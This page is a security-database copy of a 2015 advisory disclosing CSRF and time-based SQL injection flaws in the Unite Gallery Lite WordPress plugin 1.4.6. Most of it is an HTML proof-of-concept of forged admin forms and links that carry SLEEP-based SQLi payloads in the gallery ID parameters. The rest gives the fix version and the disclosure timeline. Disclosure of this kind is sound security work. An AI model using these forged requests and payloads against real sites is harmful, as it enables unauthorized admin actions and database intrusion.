Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNitin VenkateshPACKETSTORM:132842
HistoryJul 26, 2015 - 12:00 a.m.

WordPress Unite Gallery Lite 1.4.6 CSRF / SQL Injection

2015-07-2600:00:00
Nitin Venkatesh
packetstormsecurity.com
28
JSON
`# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in  
Unite Gallery Lite Wordpress Plugin v1.4.6  
# Submitter: Nitin Venkatesh  
# Product: Unite Gallery Lite Wordpress Plugin  
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/  
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper  
Neutralization of Special Elements used in an SQL Command ('SQL  
Injection')[CWE-89]  
# Affected Versions: v1.4.6 and possibly below.  
# Tested versions: v1.4.6  
# Fixed Version: v1.5  
# Link to code diff:  
https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite  
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/  
# CVE Status: New & Unassigned  
  
## Product Information:  
  
The Unite Gallery is all in one image and video gallery for WordPress.  
  
## Vulnerability Description:  
  
The admin forms of the Unite Gallery Lite Wordpress Plugin are susceptible  
to CSRF. Additionally, the following parameters were found to be  
susceptible to SQLi -  
  
Form submitted to /wp-admin/admin-ajax.php:  
- data[galleryID]  
  
Form submitted to /wp-admin/admin.php:  
- galleryid  
- id  
  
## Proof of Concept:  
  
<!DOCTYPE html>  
<html>  
<head>  
<title>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</title>  
</head>  
<body>  
<h1>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</h1>  
<p>CSRF - Create Gallery</p>  
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">  
<input type="hidden" name="action" value='unitegallery_ajax_action' />  
<input type="hidden" name="client_action" value='create_gallery' />  
<input type="hidden" name="gallery_type" value='ug-carousel' />  
<input type="hidden" name="data[main][title]" value='test 2' />  
<input type="hidden" name="data[main][alias]" value='test2' />  
<input type="hidden" name="data[main][category]" value='new' />  
<input type="hidden" name="data[main][full_width]" value='true' />  
<input type="hidden" name="data[main][gallery_width]" value='1000' />  
<input type="submit" value="submit" />  
</form>  
  
<p>CSRF + SQLi - Update Gallery</p>  
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">  
<input type="hidden" name="action" value='unitegallery_ajax_action' />  
<input type="hidden" name="client_action" value='update_gallery' />  
<input type="hidden" name="gallery_type" value='ug-carousel' />  
<input type="hidden" name="data[main][title]" value='test 2' />  
<input type="hidden" name="data[main][alias]" value='test2' />  
<input type="hidden" name="data[main][shortcode]" value='[unitegallery  
test2]' />  
<input type="hidden" name="data[main][category]" value='3' />  
<input type="hidden" name="data[main][full_width]" value='true' />  
<input type="hidden" name="data[main][gallery_width]" value='1000' />  
<input type="hidden" name="data[main][gallery_min_width]" value='150' />  
<input type="hidden" name="data[params][tile_width]" value='160' />  
<input type="hidden" name="data[params][tile_height]" value='160' />  
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />  
<input type="hidden" name="data[params][theme_carousel_align]"  
value='center' />  
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />  
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />  
<input type="hidden" name="data[params][tile_image_resolution]"  
value='medium' />  
<input type="hidden" name="data[params][carousel_padding]" value='8' />  
<input type="hidden" name="data[params][carousel_space_between_tiles]"  
value='20' />  
<input type="hidden" name="data[params][carousel_scroll_duration]"  
value='500' />  
<input type="hidden" name="data[params][carousel_scroll_easing]"  
value='easeOutCubic' />  
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />  
<input type="hidden" name="data[params][carousel_autoplay_timeout]"  
value='3000' />  
<input type="hidden" name="data[params][carousel_autoplay_direction]"  
value='right' />  
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]"  
value='true' />  
<input type="hidden" name="data[params][theme_enable_navigation]"  
value='true' />  
<input type="hidden" name="data[params][theme_navigation_enable_play]"  
value='true' />  
<input type="hidden" name="data[params][theme_navigation_align]"  
value='center' />  
<input type="hidden" name="data[params][theme_navigation_offset_hor]"  
value='0' />  
<input type="hidden" name="data[params][theme_navigation_position]"  
value='bottom' />  
<input type="hidden" name="data[params][theme_navigation_margin]"  
value='20' />  
<input type="hidden" name="data[params][theme_space_between_arrows]"  
value='5' />  
<input type="hidden" name="data[params][carousel_navigation_numtiles]"  
value='3' />  
<input type="hidden" name="data[params][position]" value='center' />  
<input type="hidden" name="data[params][margin_top]" value='0' />  
<input type="hidden" name="data[params][margin_bottom]" value='0' />  
<input type="hidden" name="data[params][margin_left]" value='0' />  
<input type="hidden" name="data[params][margin_right]" value='0' />  
<input type="hidden" name="data[params][tile_enable_action]" value='true' />  
<input type="hidden" name="data[params][tile_as_link]" value='false' />  
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />  
<input type="hidden" name="data[params][tile_enable_border]" value='true' />  
<input type="hidden" name="data[params][tile_border_width]" value='3' />  
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0'  
/>  
<input type="hidden" name="data[params][tile_border_radius]" value='0' />  
<input type="hidden" name="data[params][tile_enable_outline]" value='true'  
/>  
<input type="hidden" name="data[params][tile_outline_color]"  
value='#8b8b8b' />  
<input type="hidden" name="data[params][tile_enable_shadow]" value='false'  
/>  
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />  
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />  
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />  
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />  
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b'  
/>  
<input type="hidden" name="data[params][tile_enable_image_effect]"  
value='false' />  
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw'  
/>  
<input type="hidden" name="data[params][tile_image_effect_reverse]"  
value='false' />  
<input type="hidden" name="data[params][tile_enable_overlay]" value='true'  
/>  
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4'  
/>  
<input type="hidden" name="data[params][tile_overlay_color]"  
value='#000000' />  
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />  
<input type="hidden" name="data[params][tile_show_link_icon]" value='false'  
/>  
<input type="hidden" name="data[params][tile_space_between_icons]"  
value='26' />  
<input type="hidden" name="data[params][tile_enable_textpanel]"  
value='false' />  
<input type="hidden" name="data[params][tile_textpanel_source]"  
value='title' />  
<input type="hidden" name="data[params][tile_textpanel_always_on]"  
value='false' />  
<input type="hidden" name="data[params][tile_textpanel_appear_type]"  
value='slide' />  
<input type="hidden" name="data[params][tile_textpanel_padding_top]"  
value='8' />  
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]"  
value='8' />  
<input type="hidden" name="data[params][tile_textpanel_padding_left]"  
value='11' />  
<input type="hidden" name="data[params][tile_textpanel_padding_right]"  
value='11' />  
<input type="hidden" name="data[params][tile_textpanel_bg_color]"  
value='#000000' />  
<input type="hidden" name="data[params][tile_textpanel_bg_opacity]"  
value='0.6' />  
<input type="hidden" name="data[params][tile_textpanel_title_color]"  
value='#ffffff' />  
<input type="hidden" name="data[params][tile_textpanel_title_text_align]"  
value='left' />  
<input type="hidden" name="data[params][tile_textpanel_title_font_size]"  
value='14' />  
<input type="hidden" name="data[params][tile_textpanel_title_bold]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_type]" value='wide' />  
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_slider_control_zoom]"  
value='true' />  
<input type="hidden" name="data[params][gallery_mousewheel_role]"  
value='zoom' />  
<input type="hidden" name="data[params][lightbox_overlay_opacity]"  
value='1' />  
<input type="hidden" name="data[params][lightbox_overlay_color]"  
value='#000000' />  
<input type="hidden" name="data[params][lightbox_top_panel_opacity]"  
value='0.4' />  
<input type="hidden" name="data[params][lightbox_show_numbers]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14'  
/>  
<input type="hidden" name="data[params][lightbox_numbers_color]"  
value='#e5e5e5' />  
<input type="hidden" name="data[params][lightbox_show_textpanel]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_textpanel_width]"  
value='550' />  
<input type="hidden" name="data[params][lightbox_textpanel_source]"  
value='title' />  
<input type="hidden" name="data[params][lightbox_textpanel_title_color]"  
value='#e5e5e5' />  
<input type="hidden"  
name="data[params][lightbox_textpanel_title_text_align]" value='left' />  
<input type="hidden"  
name="data[params][lightbox_textpanel_title_font_size]" value='14' />  
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]"  
value='false' />  
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]"  
value='0.6' />  
<input type="hidden" name="data[params][lightbox_compact_overlay_color]"  
value='#000000' />  
<input type="hidden" name="data[params][lightbox_arrows_position]"  
value='sides' />  
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]"  
value='false' />  
<input type="hidden" name="data[params][lightbox_compact_show_numbers]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_compact_numbers_size]"  
value='14' />  
<input type="hidden" name="data[params][lightbox_compact_numbers_color]"  
value='#e5e5e5' />  
<input type="hidden"  
name="data[params][lightbox_compact_numbers_padding_top]" value='7' />  
<input type="hidden"  
name="data[params][lightbox_compact_numbers_padding_right]" value='5' />  
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]"  
value='title' />  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5'  
/>  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_title_font_size]" value='14'  
/>  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_border]" value='true' />  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_border_width]" value='10'  
/>  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_border_color]"  
value='#ffffff' />  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_border_radius]" value='0'  
/>  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_shadow]" value='true' />  
<input type="hidden" name="data[params][include_jquery]" value='true' />  
<input type="hidden" name="data[params][js_to_body]" value='false' />  
<input type="hidden" name="data[params][compress_output]" value='false' />  
<input type="hidden" name="data[params][gallery_debug_errors]"  
value='false' />  
  
<!-- SQLi -->  
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM  
(SELECT(SLEEP(5)))rock)' />  
<input type="submit" value="submit" />  
</form>  
  
<p>CSRF - Add Items</p>  
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">  
<input type="hidden" name="action" value='unitegallery_ajax_action' />  
<input type="hidden" name="client_action" value='add_item' />  
<input type="hidden" name="gallery_type" value='' />  
<input type="hidden" name="data[type]" value='html5video' />  
<input type="hidden" name="data[title]" value='test' />  
<input type="hidden" name="data[description]" value='' />  
<input type="hidden" name="data[urlImage]" value='' />  
<input type="hidden" name="data[urlThumb]" value='' />  
<input type="hidden" name="data[urlVideo_mp4]" value='  
http://video-js.zencoder.com/oceans-clip.mp4' />  
<input type="hidden" name="data[urlVideo_webm]" value='  
http://video-js.zencoder.com/oceans-clip.webm' />  
<input type="hidden" name="data[urlVideo_ogv]" value='  
http://video-js.zencoder.com/oceans-clip.ogv' />  
<input type="hidden" name="data[catID]" value='4' />  
<input type="submit" value="submit" />  
</form>  
  
<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>  
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">  
<input type="hidden" name="action" value='unitegallery_ajax_action' />  
<input type="hidden" name="client_action" value='get_cat_items' />  
<input type="hidden" name="gallery_type" value='ug-carousel' />  
<input type="hidden" name="data[catID]" value='3' />  
  
<!-- SQLi -->  
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM  
(SELECT(SLEEP(5)))rock)' />  
<input type="submit" value="submit" />  
</form>  
  
<p> CSRF + SQLi - Action buttons</p>  
<ul>  
<li>  
<a href="  
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)  
">  
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)  
</a></li>  
<li>  
<a href="  
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)  
">  
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)  
</a>  
</li>  
</ul>  
</body>  
</html>  
  
## Solution:  
  
Upgrade to v1.5 or higher  
  
## Disclosure Timeline:  
  
2015-06-06 - Discovered. Reported to developer.  
2015-06-10 - Updated version released.  
2015-07-25 - Publishing disclosure on FD mailing list  
  
## Disclaimer:  
  
This disclosure is purely meant for educational purposes. I will in no way  
be responsible as to how the information in this disclosure is used.  
  
  
`
JSON